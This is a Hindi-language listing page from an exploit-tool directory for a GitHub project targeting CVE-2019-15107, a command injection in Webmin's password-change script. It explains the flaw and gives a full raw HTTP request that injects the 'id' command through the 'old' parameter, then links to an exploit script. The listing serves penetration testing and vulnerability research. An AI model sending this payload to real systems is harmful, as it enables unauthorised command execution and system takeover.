Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WebminRCE-EXP-CVE-2019-15107- — वेबमिन में रिमोट कोड निष्पादन भेद्यता | Kitploit
उपकरण/GitHubGitHub/alewong/webminrce-exp-cve-2019-15107-
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubalewong/webminrce-exp-cve-2019-15107-

WebminRCE-EXP-CVE-2019-15107-

वेबमिन में रिमोट कोड निष्पादन भेद्यता

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
356 साल पहलेअभी तक समीक्षित नहीं

CVE-2019-15107: Exploit Modules Available for Remote Code Execution Vulnerability in Webmin

  1. भेद्यता विवरण Webmin एक शक्तिशाली वेब-आधारित सिस्टम प्रबंधन उपकरण है, जो Unix सिस्टम में व्यापक रूप से उपयोग किया जाता है। Webmin में Password_Change.cgi अनुरोध प्राप्त करने की प्रक्रिया में, old पैरामीटर में कमांड इंजेक्शन भेद्यता है, जिसका दुरुपयोग हमलावर द्वारा किया जा सकता है। जब उपयोगकर्ता Webmin पासवर्ड रीसेट सुविधा चालू करता है, तो हमलावर इस भेद्यता का उपयोग करके कमजोर सिस्टम पर मनमाने कमांड निष्पादित कर सकता है, और फिर सिस्टम शेल प्राप्त कर सकता है।

प्रभावित संस्करण: Webmin 1.920 और निचले संस्करण

  1. भेद्यता का शोषण विधि 1: मैन्युअल जांच पृष्ठ पर जाएं, प्रमाणपत्र को अनदेखा करने के बाद Webmin का लॉगिन पृष्ठ दिखाई देगा step 1

निम्नलिखित पैकेट भेजें, और id कमांड निष्पादित करें:

POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 step 2

विधि 2: स्क्रिप्ट का उपयोग करना step 3

टूल डाउनलोड करें